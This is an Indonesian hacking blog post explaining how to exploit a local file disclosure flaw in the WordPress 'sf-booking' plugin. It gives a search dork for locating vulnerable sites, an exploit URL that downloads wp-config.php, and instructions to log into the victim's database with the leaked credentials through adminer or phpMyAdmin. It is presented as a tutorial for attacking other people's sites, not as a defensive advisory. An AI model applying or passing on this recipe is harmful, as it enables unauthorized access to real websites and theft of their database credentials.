Wordpress adalah salah satu CMS yang sangat populer di dunia, bahkan rata-rata website di dunia lebih banyak menggunakan CMS yg satu ini di banding Cms lainnya.
Keunggulan CMS ini adalah yaitu sulit untuk di tembus dengan cara injection atau suntik. Karna kelebihan tersebut banyak develover yang memakai CMS Wordpress.
Namun bagaimana jika CMS yang satu ini vuln serangan Local File Disclosure, pasti kaget bukan. Karna bug yang cukup fatal tersebut telah di temukan pada CMS Wordpress, jadi kali ini kita akan share cara exploitasinya.
1. Dorking menggunakan dork di bawah ini
Inurl:/wp-content/plugins/sf-booking/lib/2. Nemu target, langsung pasang exploit, contoh
http://site.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/wp-config.phpDengan begitu configuration dari website tersebut bisa terunduh, dan kalian bisa liat User dan Password Database, jadi tinggal login dengan user dan password lewat adminer/phpmyadmin.
Sekian tutorial pada kali ini, terima kasih telah berkunjung di blog sederhana ini.
Muhammad Sona | LinuxCrews
comment 0 comments:
more_vertsentiment_satisfied Emoticon